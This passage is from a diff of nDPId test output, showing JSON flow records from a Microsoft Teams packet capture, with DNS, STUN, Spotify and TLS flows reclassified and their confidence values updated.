{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685091,"flow_last_seen":1587041685104,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":53678,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695422,"flow_last_seen":1587041695432,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693611,"flow_last_seen":1587041697663,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1587041693654,"flow_last_seen":1587041697713,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1745,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693582,"flow_last_seen":1587041693698,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695422,"flow_last_seen":1587041695432,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693611,"flow_last_seen":1587041697663,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1587041693654,"flow_last_seen":1587041697713,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1745,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693582,"flow_last_seen":1587041693698,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
